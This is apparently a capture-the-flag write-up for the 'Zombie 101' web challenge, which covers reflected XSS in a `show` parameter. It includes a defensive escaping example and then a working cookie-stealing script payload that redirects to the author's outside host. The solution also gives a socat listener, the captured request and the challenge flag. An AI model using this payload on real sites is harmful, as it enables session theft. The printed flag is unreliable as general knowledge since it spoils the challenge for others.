Tags: web xss 

Rating:

# Zombie 101 - Web (100 pts)

## Description
> Can you survive the Zombie gauntlet!?
>
> First in a sequence of four related challenges. Solving one will unlock the next one in the sequence.
>
> They all use the same source code but each one has a different configuration file.
>
> This first one is a garden variety "steal the admin's cookie".
>
> Good luck!
>
> **Please don't use any automated tools like dirbuster/sqlmap/etc.. on ANY challenges. They won't help anyway.**
>
> https://zombie-101-tlejfksioa-ul.a.run.app

## Provided files
zombie-101-source.zip - a ZIP archive with the source code for the website and the admin bot \[[download](https://ctfnote.shinmai.wtf:31337/files/downloadFile?id=m8JOpS1fmtIHrGV)\]

## Ideas and observations
1. The description pretty explicitly states that this is an XSS challenge, and the source code confirms it
2. There's just a straight-up unfiltered XSS in the `/zombie` route: the `show` GET parameter is reflected into the page without any escaping
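
The bug class above and its fix, as an added example that is not the challenge's own source: a reconstruction of a `show` value interpolated raw into the `/zombie` page, beside the same page with HTML escaping and an `HttpOnly` flag on the cookie so `document.cookie` cannot read it. The route and parameter names come from the writeup; the markup, function names and the sample URLs are assumptions.

```javascript
// Hypothetical reconstruction of the reflected-parameter pattern, not the
// challenge's code. Only "/zombie" and "show" are taken from the writeup.

// Escape the characters that let text break out of an HTML text node or attribute.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable shape: the query value is concatenated straight into the page.
function renderZombieVulnerable(show) {
  return `<html><body><h1>Zombie</h1><p>${show}</p></body></html>`;
}

// Hardened shape: identical page, but the value is escaped before interpolation.
function renderZombieHardened(show) {
  return `<html><body><h1>Zombie</h1><p>${escapeHtml(show)}</p></body></html>`;
}

// Second layer: a cookie the admin bot carries should never be readable from
// script. HttpOnly keeps it out of document.cookie even if an XSS slips through.
function flagCookieHeader(value) {
  return `flag=${encodeURIComponent(value)}; HttpOnly; Secure; SameSite=Strict; Path=/`;
}

// Read `show` the way the server sees it: percent-decoded by the URL parser.
function extractShow(requestUrl) {
  return new URL(requestUrl).searchParams.get('show') || '';
}

// Simple check for the rendered output: did a script element survive rendering?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed sample requests (placeholder host, benign probe string).
const BENIGN_URL = 'https://example.invalid/zombie?show=hello%20world';
const PROBE_URL = 'https://example.invalid/zombie?show=%3Cscript%3Ealert(1)%3C%2Fscript%3E';

// Same probe, two outcomes: the raw page keeps the script, the escaped one does not.
const rawPage = renderZombieVulnerable(extractShow(PROBE_URL));
const safePage = renderZombieHardened(extractShow(PROBE_URL));
console.log(containsScriptTag(rawPage), containsScriptTag(safePage)); // true false
```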

## Notes
1. for some reason my go-to of `` didn't work for the bot but did in testing

## Solution
1. Let's just use a straight-up script tag, then: `<script>window.location='http://ctf.shinmai.wtf/?cookie='+btoa(JSON.stringify(document.cookie));</script>`
2. URL-encode it, add it to the URL and send the result to the bot: `https://zombie-101-tlejfksioa-ul.a.run.app/zombie?show=%3Cscript%3Ewindow%2Elocation%3D%27http%3A%2F%2Fctf%2Eshinmai%2Ewtf%2F%3Fcookie%3D%27%2Bbtoa%28JSON%2Estringify%28document%2Ecookie%29%29%3B%3C%2Fscript%3E`
3. on the server just set up a simple socat listener: `socat tcp-listen:80,reuseaddr,fork -`
4. We soon get the following request from the bot:
```http
GET /?cookie=ImZsYWc9d2N0ZntjMTQ1NTFjLTRkbTFuLTgwNy1jaDQxLW4xYzMtajA4LTkzMjYxfSI= HTTP/1.1
referer: https://zombie-101-tlejfksioa-ul.a.run.app/zombie?show=%3Cscript%3Ewindow%2Elocation%3D%27http%3A%2F%2Fctf%2Eshinmai%2Ewtf%2F%3Fcookie%3D%27%2Bbtoa%28JSON%2Estringify%28document%2Ecookie%29%29%3B%3C%2Fscript%3E
accept: text/html,*/*
content-type: application/x-www-form-urlencoded;charset=UTF-8
user-agent: Mozilla/5.0 Chrome/10.0.613.0 Safari/534.15 Zombie.js/6.1.4
host: ctf.shinmai.wtf
Connection: keep-alive
```
5. decode the base64 for the flag

`wctf{c14551c-4dm1n-807-ch41-n1c3-j08-93261}`

Original writeup (https://gist.github.com/shinmai/5720d1f0a214d0878cfb530eb975c469#zombie-101---web-100-pts).